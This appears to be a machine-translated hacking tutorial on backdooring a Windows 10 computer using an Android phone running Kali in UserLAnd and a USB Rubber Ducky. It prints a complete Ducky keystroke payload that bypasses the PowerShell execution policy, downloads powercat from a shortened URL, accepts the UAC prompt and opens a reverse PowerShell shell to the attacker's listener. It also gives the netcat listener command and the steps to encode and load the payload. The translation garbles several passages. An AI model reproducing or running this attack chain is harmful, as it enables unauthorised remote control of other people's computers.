With an unobtrusive Android phone and a USB flash drive, an attacker could compromise a Windows 10 computer in less than 15 seconds. After a root shell has been set up, the long-term persistence of the backdoor can be configured with just two simple commands – bypassing antivirus software and Windows Defender.
How this Attack Works
Powercat is a fully functional PowerShell module. It works much like Netcat and allows PowerShell users to create TCP and UDP tunnels with simple command-line arguments. A PowerShell payload is created to download, import, and run Powercat with a single command. Then it is encoded into a binary format that can understand USB Rubber Ducky.
The USB Rubber Ducky runs Powercat in Windows 1
There is some hardware required to run this hack, which some of you might already have lying around. Below are the four main points listed.
The USB Rubber Ducky identifies itself as a keyboard when plugged into a computer and then automatically types in malicious commands that are pre-programmed. The payload can be adjusted to perform a variety of advanced exploits. Prices for the USB Rubber Ducky from Hak5 start at $ 45.
Buy a USB Rubber Ducky from Amazon | Hak5
As an alternative to USB Rubber Ducky, the NetHunter and DroidDucky projects can populate Android devices with keyboard input tools. You must change the Android operating system, but this is beyond the scope of this article. Both NetHunter and DroidDucky are fantastic projects for anyone who wants to change the operating system of their phones. Imagine connecting an Android phone to a computer and running complex PowerShell payloads in seconds – no USB rubber ducky required.
. 2 Android device with UserLAnd installed
Any Android phone or tablet running the UserLAnd app is eligible. The device does not need to be rooted. All that is required is Internet access via WLAN and the UserLAnd application already mentioned.
3. OTG adapter (conditional)
After creating the PowerShell payload (in a later step), it must be moved to the microSD card in UBS Rubber Ducky. Some Android phones and tablet models come with a microSD expansion slot for more storage. So if you have such a memory, you can easily do it because you can transfer the file in this way.
If your device does not have a microSD slot, you will need an On-The-Go adapter (OTG) that allows you to connect memory cards to your device through the charging port. An all-in-one solution would be the Monoprice USB-C microSD reader if your phone has a USB Type-C port. Lexar offers a similar product for micro-USB ports.
Since the USB Rubber Ducky comes with a microSD to USB adapter, you can opt for an OTG adapter with a female USB type A end for the microSD adapter plug in. If your Android device has a USB-C port, Aukey offers a good adapter. There are many low-cost options available for micro-USB ports, such as: B. the Ugreen cable.
Alternatively, any combination of adapters can do the job. As you can see below, I'm using an Aukey adapter that's paired with an anchor-style portable card reader.
4. Virtual Private Server (optional)
Whether or not a Virtual Private Server (VPS) is required depends on the attack scenario. When a Wi-Fi network is shared with the target device, embedding the attacker's local IP address into the payload works fine. In other scenarios, it may be necessary to deploy a VPS or Ngrok server.
Step 1: Getting Started with UserLAnd
Before proceeding, read the manual of Distortion via to turn an Android phone into a hacking device without root and my guide to hacking WPA2- Wi-Fi passwords with Android as they contain the basics of UserLAnd and setting up Kali Linux, Ngrok and installing the necessary software that will follow this article.  You must install and configure UserLAnd, create a new file system, and connect to the operating system through SSH using ConnectBot (or JuiceSSH or the built-in SSH client).
Step 2: Update the System and Install Essential Software
As with any Unix-based device, you should ensure that the installed packages are up-to-date before proceeding with the projects. Make sure that updates the system and the required software is installed, and install Java that is required for the USB Rubber Ducky payload using the following commands.
sudo apt-get update & sudo apt-get dist-upgrade
This command may take several minutes, depending on the available Internet speed and Android CPU. Older Android devices take longer to download and decompress packages.
Use the following command to install the required software.
sudo apt-get update & sudo apt-get install net-tools netcat gnupg curl wget git nano screen  Java is needed to compile Ducky payloads. Use the following command to install it.
sudo apt-get install default-jre-headless
Restart the Android device to make sure that the entire package and kernel updates take effect the next time you launch the Android in UserLAnd Kali OS.
Step 3: Starting the Netcat Listener
There are several ways to set up the Netcat Listener to allow remote access to the Windows destination computer, depending on the attack scenario.
- Local IP Address . If the target computer is on the same Wi-Fi network as the Android device, the Netcat listener can be easily started in the UserLAnd Kali OS. Although private and fast, this method is not ideal. If and when the destination disconnects from the shared Wi-Fi network, the Netcat connection is broken and there is no way to access the device as it moves between different networks.
- Virtual Private Server . VPS are ideal for remotely hacking targets as they move between different Wi-Fi networks around the world. In this scenario, the attacker would buy a cheap VPS and SSH. Netcat and Screen would be installed on the hacked Windows computer for persistent persistence. This can be completely set up with Android.
- Ngrok . Setting up remote access with Ngrok was treated to some degree in " Hack WPA2 Wi-Fi Passwords with Android". In this case, Ngrok redirects requests to the attacker's Android device. Free Ngrok accounts do not allow users to recycle subdomains. This would only allow persistence until the Ngrok server on the Android device stops. Although it is possible to run a server in Android for a long time, it is inevitable that it will shut down after restarting the Android operating system or silently close the background UserLAnd app.
In any case, it is a good idea to set up Screen so that terminal sessions persist despite closed SSH connections. On the screen, users can manage multiple terminal sessions in the same console. Readers are encouraged to learn how to use Screen as it simplifies navigating and "disconnecting" multiple terminal sessions without losing data.
To start a new screen session, simply enter screen.
Then Use the ifconfig -a command to identify the local IP address used by the system. This IP is needed in the next step when the payload is created.
wlan0: flags = 4163
mtu 1500 inet 192.168.0.208 Netmask 255.255.255.0 Broadcast 192.168.0.255 inet6 ::::: prefixlen 64 scopeid 0x20 unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC) RX Packets 95745 Bytes 115985231 (110.6 MiB) RX error 0 fell 0 exceeded 0 frame 0 TX packets 44735 bytes 4289090 (4.0 MiB) TX error 0 dropped 0 exceeded 0 carrier 0 collision 0
Many interfaces will be available in the UserLAnd Kali OS. The "wlan0" or "wlan1" interface most likely contains the device's local IP address (192.168.0.208). Instead, VPS users integrate the same external IP address used with SSHing into the server. Ngrok users must set up a server and embed the URL in the payload.
Finally, start the Netcat Listener with the following command.
netcat -vv -l -p 1234
Using port ([19459009)] -p ) In 1234, Netcat listens on every available interface ( -l ). -vv ( verbose ) returns the IP address of the destination in the terminal when a new connection is made.
After launch the Android app, launch the UserLAnd app and SSH into the new potash system. Use nano to create a new "payload.txt" file in your home directory ( ~ / ). This file contains the Ducky payload in plain text.
nano ~ / payload.txt
Comments ( REM ) have been added to explain the function of each payload line.
REM This first delay lasts the Ducky for 5.5 seconds to reach the target REM operating system some time to mount the USB as a keyboard device. DELAY 5500 REM Opens the Windows command prompt. GUI r REM delays by .7 seconds to give the boot prompt time to open. DELAY 700 REM Specifies the PowerShell payload. STRING Powershell / w 1 / C $ a = $ env: TEMP; Set-ExecutionPolicy Bypass; wget https://cutt.ly/cW13i -o $ a d.ps1; ipmo $ a d.ps1; powercat -c 192.168.0.208 -p 1234 -e powershell REM Press Ctrl + Shirt + Enter to run PowerShell with administrator privileges. CTRL-SHIFT REM Delay: 0.85 seconds for the UAC prompt to open. DELAY 850 REM Press Alt + Y to bypass User Account Control. ALT y
There's a lot going on in the PowerShell One Liner. There are several commands separated by semicolons.
- $ a = $ env: TEMP - Temporary directory of target is set to variable $ a. This variable will be called twice in the script later. First act as output directory for the powercat.ps1 and called again on import. The use of the single letter $ helps to shorten the overall length of the payload. This is more effective than using "C: Users % USERNAME% AppData Local Temp" in the payload.
- Set-ExecutionPolicy Bypass - Set-ExecutionPolicy is a security feature of PowerShell that prevents many features from similar PowerShell payloads. In several tests, I found that setting the -ExecutionPolicy option was not enough to bypass this security feature. As administrator (root), this policy can be bypassed.
- wget https://cutt.ly/cW13i -o $ a d.ps1 - PowerShell is directed to invoke a web request ( wget ) and calls the powercat.ps1 with the shortened cutt.ly URL. This URL links directly to the Powercat GitHub page, but can be changed to the full URL or other shortened URL. The powercat.ps1 is stored in the temporary directory ( $ a ) with the file name "d.ps1" ( -o ). The file name was shortened from a single letter to keep the Ducky payload as short as possible.
- ipmo $ a d.ps1 - The PowerShell Import Module function is called with the alias ipmo . , Again, use the shorter version of the command to keep the Ducky payload short. The powercat.ps1 is imported.
- powercat -c 192.168.0.208 -p 1234 -e Powershell - Finally, Powercat is run and instructed to connect ( -c ) to the server of the attacker ( 192.168.0.208 ) at the port ( -p ) 1234 and execute ( -e ) PowerShell when the connection is established. This allows the attacker to effectively access a root PowerShell terminal.
The REM comments can remain in the payload and have no effect on the keystrokes. To save and terminate the nano-terminal press ctrl-x then and then . Enter .
Step 5: Encryption of Payload
Rubber USB Rubber Ducky Payloads can not be loaded in plain text onto the microSD card . Instead, the Hak5 Duck Encoder is used to convert the plaintext payload to a binary format.
To clone the Duck Encoder repository, use the following command. Https://github.com/hak5darren/ USB-Rubber-Ducky /
Change ( cd ) to the newly created encoder / directory.
cd USB-Rubber-Ducky / Encoder /
and encrypt the payload.txt using the command below. This command uses the encoder.jar file to convert the input file ( -i ) to the required binary file "inject.bin" ( -o ). The name of the output file is not arbitrary and must be named "inject.bin" for Ducky to make keystrokes.
java -jar encoder.jar -i ~ / payload.txt -o inject.bin
Hak5 Duck Encoder 2.6.4 Loading file .... [ OK ] Keyboard file is loading .... [ OK ] Loading language file ... [ OK ] Loading DuckyScript ..... [ OK ] DuckyScript Complete ..... [ OK ]
When this is done, there will be a new "inject.bin" file in the Encoder / directory. This can be checked with the following command ls -l .
-rw -r - r--. 1 root root 1466 Jan 11 11:39 README -rw-r - r--. 1 root root 57535 Jan 11 11:39 encoder.jar -rw-r - r--. 1 root root 86 Jan 12 01:57 inject.bin drwxr-xr-x. 2 root root 4096 January 11 11:39 AM resources drwxr-xr-x. 2 root root 4096 Jan 11 11:39 src
Step 6: Connect the Ducky MicroSD to the Android device
Insert the Ducky microSD card with the card reader adapter, the internal microSD card slot, or the OTG adapter with card reader in the Android device. The contents of the microSD file can be viewed using the Android download app.
After a few seconds, a new removable disk is available via the download app ( Example ). Navigate back to the Kali OS terminal. The Kali operating system does not have access to external storage devices (such as the microSD card). Therefore, the "inject.bin" must first be copied to the / sdcard / Download / directory ( cp ), then copied to the microSD card using the Android operating system.
cp ~ / USB-Rubber-Ducky / Encoder / inject.bin / sdcard / Download /
And now it's available in the download app.  Android for Hackers: Backdoor of Windows 10 with an Android Phone and USB Rubber Ducky ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>